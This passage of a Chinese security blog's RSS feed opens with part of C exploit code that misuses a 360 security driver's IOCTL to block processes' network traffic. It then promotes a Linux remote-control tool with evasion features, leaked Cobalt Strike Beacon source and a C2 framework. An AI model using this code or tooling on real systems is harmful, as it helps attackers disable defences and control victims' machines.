class="code-snippet__keyword">sizeof</span>(ls));</span></code><br/><code><span leaf=""> wcsncpy_s(ls.szPath, MAX_PATH, szImagePath, _TRUNCATE);</span></code><br/><code><span leaf=""> ConvertToNtPath(szImagePath, ls.szNtPath); <span class="code-snippet__comment">// 转换为NT路径格式</span></span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> ls.bCancelFlag = <span class="code-snippet__literal">FALSE</span>; <span class="code-snippet__comment">// FALSE = 应用限制</span></span></code><br/><code><span leaf=""> ls.qwBlockCnnt = LLONG_MAX; <span class="code-snippet__comment">// 设置为最大值 = 完全阻断</span></span></code><br/><code><span leaf=""> ls.nLimitSend = LLONG_MAX; <span class="code-snippet__comment">// 上传限制 = 无限大</span></span></code><br/><code><span leaf=""> ls.nLimitRecv = LLONG_MAX; <span class="code-snippet__comment">// 下载限制 = 无限大</span></span></code><br/><code><span leaf=""> ls.dwZeroCheck = <span class="code-snippet__number">0</span>;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// 4. 发送 IOCTL 请求</span></span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (!DeviceIoControl(</span></code><br/><code><span leaf=""> hDevice,</span></code><br/><code><span leaf=""> <span class="code-snippet__number">0x220804</span>, <span class="code-snippet__comment">// IOCTL_360TDIFILTER_LIMIT_PROCESS_SPEED</span></span></code><br/><code><span leaf=""> &amp;ls,</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">sizeof</span>(ls),</span></code><br/><code><span leaf=""> <span class="code-snippet__literal">NULL</span>,</span></code><br/><code><span leaf=""> <span class="code-snippet__number">0</span>,</span></code><br/><code><span leaf=""> &amp;dwBytesReturned,</span></code><br/><code><span leaf=""> <span class="code-snippet__literal">NULL</span>)) {</span></code><br/><code><span leaf=""> printf(<span class="code-snippet__string">&#34;[!] DeviceIoControl failed (Error: %lu)\n&#34;</span>, GetLastError());</span></code><br/><code><span leaf=""> CloseHandle(hDevice);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> <span class="code-snippet__literal">FALSE</span>;</span></code><br/><code><span leaf=""> }</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""> printf(<span class="code-snippet__string">&#34;[+] Successfully blocked: %S\n&#34;</span>, szImagePath);</span></code><br/><code><span leaf=""> CloseHandle(hDevice);</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">return</span> <span class="code-snippet__literal">TRUE</span>;</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p data-layout-id="34" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">完整的EXP可以查看我的Github:</span></p><p data-layout-id="35" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><a href="https://github.com/kyxiaxiang/360WFP_Exploit" target="_blank">https://github.com/kyxiaxiang/360WFP_Exploit</a></span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="36"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6723880597014925" data-s="300,640" data-type="png" data-w="1340" type="block" data-imgfileid="100000092" src="https://wechat2rss.xlab.app/img-proxy/?k=338ec83c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Frf1YTqFEx5KnicpSXCZATIRRSX996r6okQQb1z8B1zkYmpQwibAuZbJ03646YqkHUhyOAic3zwcTPw3OVFaw1EIPicc7x6YLic0jmBkHeMXO2quI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="37" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">阻断后：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="38"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.617008069522036" data-s="300,640" data-type="png" data-w="1611" type="block" data-imgfileid="100000093" src="https://wechat2rss.xlab.app/img-proxy/?k=7413d917&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Frf1YTqFEx5LnwwlPNibuPyNfsTNWZFIQEyJtzI1wz3Ltcc3okfsfFHTF2phow0N1Vd4F5Z00ibpkEopQbFpbu7e7SEEwHUz8KVH3JN06fpjS4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="39" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">当然了360对自己是加了白名单的，所以银狐们退下吧(/摊手/)</span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3585d28b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484273%26idx%3D1%26sn%3D01fd0ab06f509d5c7c73f7628c025104">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 11 Feb 2026 01:20:00 +0800</pubDate>
    </item>
    <item>
      <title>MiaoMeow:一个萌芽阶段的Linux远程管理工具</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484271&amp;idx=1&amp;sn=bc955daef9ff3a564cbd0e30f7912f85</link>
      <description>实在是无聊极了，正好最近用ImGUI搓一些神秘的玩具比较上头，顺手搓了这么个玩意儿~主界面预览：经典优雅（b</description>
      <content:encoded><![CDATA[<p><span>可以遐想</span> <span>2025-12-21 18:04</span> <span style="display: inline-block;">日本</span></p>




  <p>以下文章来源于：遐想的小窝</p>
  <strong>遐想的小窝</strong>
  <p>曾专注红队对抗和武器化开发，现懒癌晚期，随缘研究。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=0f0ec67e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKx83LrBfp13RWU2LlxUz647OgfRhJh2ZT7xj5beNAP08CBibsqmA3ZOg%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p data-layout-id="0" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">实在是无聊极了，正好最近用ImGUI搓一些神秘的玩具比较上头，顺手搓了这么个玩意儿~</span></p><p data-layout-id="1" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">主界面预览：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="2"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100000027" data-ratio="0.669296987087518" data-s="300,640" type="block" data-type="png" data-w="1394" src="https://wechat2rss.xlab.app/img-proxy/?k=e832d87f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKQnBMw13pvbvh7eEZeibW8EyEp9qMyQt1o7axDqz7hluzibGJUDoYvu2A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="3" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">经典优雅（bushi）的界面</span></p><p data-layout-id="4" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">监听创建：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="5"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000029" class="rich_pages wxw-img" data-ratio="0.508235294117647" data-s="300,640" data-type="png" data-w="425" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=9f296a6c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKPFNZLicRPtb4rGfiaPicRUBmIlyDOgXd4HDyL5hPyiaK7y5nMA8iaBJJEXQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="6" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">客户端生成：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="7"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000030" class="rich_pages wxw-img" data-ratio="0.7432065217391305" data-s="300,640" data-type="png" data-w="736" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=22049bc5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKV1HI0tr8zEp3lyGiaJI0sD5klqhsGvSrVdueqpGhQbAnAsiaeUhLdqnA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="8"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000031" class="rich_pages wxw-img" data-ratio="0.658008658008658" data-s="300,640" data-type="png" data-w="231" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5cf5e877&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKbImUPEBJicpib4Tne8MUDnwAqA7z6GicFD19J7Zh51Rp4XibjDHH8cP1eQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="9" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">优雅（cucao）的进程伪装（bushi），朴素（jianlou）的数据加密。测试执行效果。</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="10"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000032" class="rich_pages wxw-img" data-ratio="0.08426966292134831" data-s="300,640" data-type="png" data-w="712" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=402b8d7a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKNDYMKIWZUviaWH8fOn5hgUbMMGCMDC9PDC61ibsu6hDY5pBIR5swmUGA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="11"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000033" class="rich_pages wxw-img" data-ratio="0.6671459381739756" data-s="300,640" data-type="png" data-w="1391" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fbd8f447&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKiaicVBia4AbfiaoTicpOEKK6icJsmQh49tbj909JficvymoKcYRyecyvRTd2w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="12" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">Shell功能吧本来是打算做成完美的交互式，结果自然是懒癌胜利（但是是支持ctrl+C的）。测试支持MemFD：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="13"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000034" class="rich_pages wxw-img" data-ratio="0.3524355300859599" data-s="300,640" data-type="png" data-w="1396" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=914a8cf5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKAMicWPEI9gkS20EN0poykyau6ibfQLUd65Q3xqET2YS9mWje3XYKNYqw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="14" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">文件管理：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="15"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000035" class="rich_pages wxw-img" data-ratio="0.3668596237337192" data-s="300,640" data-type="png" data-w="1382" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=969eba2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKxNicQ8jcOttXW5ic4QQpMqk2a5IBb8CXjc7G3vbTHJBl1ADnM2I8o3Mg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="16" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">支持修改时间戳和权限：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="17"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000036" class="rich_pages wxw-img" data-ratio="0.4517543859649123" data-s="300,640" data-type="png" data-w="228" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a5afa081&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKcNhdVLsFW3jf1TxNzribwZmpM8oibjhVITS8rIKQSbNP0S845HibH6eEg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="18" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">端口转发和反向代理：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="19"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000037" class="rich_pages wxw-img" data-ratio="0.36107091172214184" data-s="300,640" data-type="png" data-w="1382" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5dc60546&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKx3nmX7cD5NxsaAZnPicZrE8b8xJjR6cjEpSVzGbE2MC5OhibtLMbJWCA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="20"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000038" class="rich_pages wxw-img" data-ratio="0.3601725377426312" data-s="300,640" data-type="png" data-w="1391" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=ede6fbee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjK34U80hkQVp35bQm2Msj2o4aAsprao0urvqL1PcbLeoBfEysHoVTptQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p data-layout-id="21" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">进程和网络链接：</span></p><div style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="22"><p style="text-align: center;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf=""><img data-imgfileid="100000039" class="rich_pages wxw-img" data-ratio="0.36838340486409155" data-s="300,640" data-type="png" data-w="1398" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=93845874&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4AlMkicsWBX9bOJUOmjGor0lqic9DccBjKwZwCxJfTzC8RvxCK3pvV236X2nicQN9RMeiaZANVKjhUat3dRZvpce4g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><h1 data-layout-id="23" style="font-size: 20px;font-weight: 500;color: rgba(43, 119, 191, 1);line-height: 1.8;margin-bottom: 12px;text-align: center;"><span leaf="">免责声明</span></h1><p style="text-align: start;font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;" data-layout-id="24"><span leaf=""><span textstyle="" style="color: rgb(31, 35, 40);">本工具仅供学习和授权测试使用。请勿用于任何非法活动。使用者需对自己的行为负责。</span></span></p><p data-layout-id="25" style="font-size: 17px;font-weight: 400;color: rgba(0,0,0,0.9);line-height: 1.8;margin-bottom: 24px;"><span leaf="">项目地址：<a href="https://github.com/kyxiaxiang/MiaoMeow" target="_blank">https://github.com/kyxiaxiang/MiaoMeow</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3988dd5c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484271%26idx%3D1%26sn%3Dbc955daef9ff3a564cbd0e30f7912f85">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 21 Dec 2025 18:04:00 +0800</pubDate>
    </item>
    <item>
      <title>重金求才</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484269&amp;idx=1&amp;sn=5788afc5dd382d6a82ea4865a58165aa</link>
      <description>诚招高级渗透工程师一名，JD如图。</description>
      <content:encoded><![CDATA[<p>
<span></span> <span>2025-09-16 14:32</span> <span style="display: inline-block;">浙江</span>
</p>

<p>诚招高级渗透工程师一名，JD如图。</p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=ab6ad988&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9cW0Oq2GdFeicU1w5Yc0clibe3phH3Bmlgibm8RCXpv5NGeBWDDBrj3DNCswLKiaJu4ic9ukO0UIZfER5Q%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<div id="js_image_content" class="image_content "><h1 class="rich_media_title ">重金求才</h1> <p id="js_image_desc" class="share_notice js_underline_content "></p> <div id="js_shoptag_area" class="wx_shoptag_area "></div> <div id="js_shopprofile_area" class="wx_shopprofile_area "></div> <!---->   <div id="js_article_area" class="wx_live_area "></div> <!----> <!----> <!----> <!----> <!----> <!----> <!----> <!----> <!----> <div class="rich_media_tool "><div class="rich_media_info weui-flex policy_tips js_ad_policy_tips tips_global_primary claim_source_block "><!----> <!----></div></div> <div id="js_end_poi_area" class="end_poi_area "></div> <div id="js_publish_source" class="publish_source "></div> </div>


<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e1daa8fb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9cW0Oq2GdFeicU1w5Yc0clibeG4Vzdlmj6d0xkeRO4QqgtEcOWzpGlkXdA4FicE7zMmdQTpkmkOuMdsw%2F0%3Fwx_fmt%3Dwebp"/></p>




<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=84d38f67&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484269%26idx%3D1%26sn%3D5788afc5dd382d6a82ea4865a58165aa">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 16 Sep 2025 14:32:00 +0800</pubDate>
    </item>
    <item>
      <title>CobaltStrike Beacon C++ 源码开源分享</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484257&amp;idx=1&amp;sn=fdc6978df3ccd8172ce47eb704bce937</link>
      <description>一鲸落，万物生我在 GitHub 上公开了 CobaltStrike Beacon 的 C++ 源代码：🔗</description>
      <content:encoded><![CDATA[<p>
<span>可以遐想</span> <span>2025-08-03 15:12</span> <span style="display: inline-block;">安徽</span>
</p>




<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=4fe7e64a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4AlMkicsWBXicq59HqlploPZtYJIoC1rh6MichjwtcAQaObyIj83GbKWPfmgsAZZMMJAMwXv5V4xiahM0icYrNNtuOQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<h1 data-start="308" data-end="342" data-pm-slice="0 0 []"><span leaf="">一鲸落，万物生</span></h1><p data-start="355" data-end="403" style="margin-bottom: 24px;"><span leaf="">我在 GitHub 上公开了 CobaltStrike Beacon 的 C++ 源代码：</span></p><p data-start="405" data-end="529" style="margin-bottom: 24px;"><span leaf="">🔗 项目地址：</span><span leaf=""><br/></span><span leaf="">👉 github.com/kyxiaxiang/CobaltStrikeBeaconCppSource</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3 data-start="536" data-end="549"><span leaf="">🧭 为什么开源？</span></h3><p data-start="551" data-end="631" style="margin-bottom: 24px;"><span leaf="">我曾从国内某二手平台购入此源码，过程中深感“源码倒卖”之乱象已久——</span><span leaf=""><br/></span><span leaf="">同样的代码反复售卖、换皮包装、贴牌割韭菜，或以二开，或以教学。一些人靠此轻松牟利，却阻碍了真正的技术交流。</span></p><p data-start="633" data-end="654" style="margin-bottom: 24px;"><span leaf="">我选择开源，是想打破这种不对等的信息垄断。</span></p><blockquote><p data-start="658" data-end="697"><span leaf="">一鲸落，万物生。</span><span leaf=""><br/></span><span leaf="">源码不该成为少数人的私利，而应成为技术共同体的土壤。</span></p></blockquote><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3 data-start="704" data-end="715"><span leaf="">🔍 项目亮点</span></h3><ul class="list-paddingleft-1"><li><p data-start="719" data-end="746"><span leaf="">✅ 开箱即用的 Beacon 核心源码（C++ 实现）</span></p></li><li><p data-start="749" data-end="773"><span leaf="">✅ 包含通信框架、加密处理、DLL逻辑等关键部分</span></p></li><li><p data-start="776" data-end="806"><span leaf="">✅ 可作为自研 C2 框架、红队 Payload 的技术参考</span></p></li></ul><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3 data-start="813" data-end="825"><span leaf="">🔧 使用前准备</span></h3><p data-start="827" data-end="840" style="margin-bottom: 24px;"><span leaf="">要编译运行此项目，你需要：</span></p><ol class="list-paddingleft-1"><li><p data-start="845" data-end="900"><span leaf="">安装 LibTomMath</span></p></li><li><p data-start="904" data-end="961"><span leaf="">安装 LibTomCrypt</span></p></li><li><p data-start="965" data-end="981"><span leaf="">自行反编译相关 JAR 文件</span></p></li><li><p data-start="985" data-end="996"><span leaf="">替换目标 DLL 文件</span></p></li></ol><p data-start="998" data-end="1035" style="margin-bottom: 24px;"><span leaf="">📌 注：涉及 Java/Native 混合构建流程，请具备基础逆向能力。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3 data-start="1042" data-end="1053"><span leaf="">🎯 我的初衷</span></h3><p data-start="1055" data-end="1073" style="margin-bottom: 24px;"><span leaf="">我开源这份项目，是基于以下几点考虑：</span></p><ul class="list-paddingleft-1"><li><p data-start="1077" data-end="1100"><span leaf="">🌱 </span><strong data-start="1080" data-end="1100"><span leaf="">促进国产安全工具的透明化与标准化</span></strong></p></li><li><p data-start="1103" data-end="1129"><span leaf="">🧠 </span><strong data-start="1106" data-end="1129"><span leaf="">为网络攻防爱好者、红蓝队员提供真实参考</span></strong></p></li><li><p data-start="1132" data-end="1160"><span leaf="">🔍 </span><strong data-start="1135" data-end="1160"><span leaf="">推动 AV/EDR 行业提升检测与防护能力</span></strong></p></li><li><p data-start="1163" data-end="1187"><span leaf="">🤝 </span><strong data-start="1166" data-end="1187"><span leaf="">为真正热爱安全的人打开更多学习入口</span></strong></p></li></ul><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h3 data-start="1194" data-end="1205"><span leaf="">📢 特别声明</span></h3><p data-start="1207" data-end="1234" style="margin-bottom: 24px;"><span leaf="">本项目</span><strong data-start="1210" data-end="1233"><span leaf="">仅供合法、合规、安全研究与教育用途使用</span></strong><span leaf="">。</span></p><p data-start="1236" data-end="1267" style="margin-bottom: 24px;"><span leaf="">⚠️ 请勿用于非法用途，否则后果自负。本人对此不承担任何责任。</span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484257">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=0dcdcab7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484257%26idx%3D1%26sn%3Dfdc6978df3ccd8172ce47eb704bce937">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 03 Aug 2025 15:12:00 +0800</pubDate>
    </item>
    <item>
      <title>GateSentinel：为实战而生的现代化 C2 框架（雏形）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484255&amp;idx=1&amp;sn=dd2ff20483c9ea309813162fdd78632e</link>
      <description>在当前高强度的攻防对抗环境中，C2 框架早已不只是一个“可用”工具，而是“致胜”的核心。无论是红队演练、HV</description>
      <content:encoded><![CDATA[<p>
<span>可以遐想</span> <span>2025-07-17 10:45</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>在当前高强度的攻防对抗环境中，C2 框架早已不只是一个“可用”工具，而是“致胜”的核心。无论是红队演练、HV</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=d7d7a8cb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F4AlMkicsWBX9giaMLNiaRLvCiaib2rE9NWEbMfZRhuvS2omDUJPsOGPh7d7ibTOzXEeRqTHsEwzHpU1FvYia6TbVvFgyg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


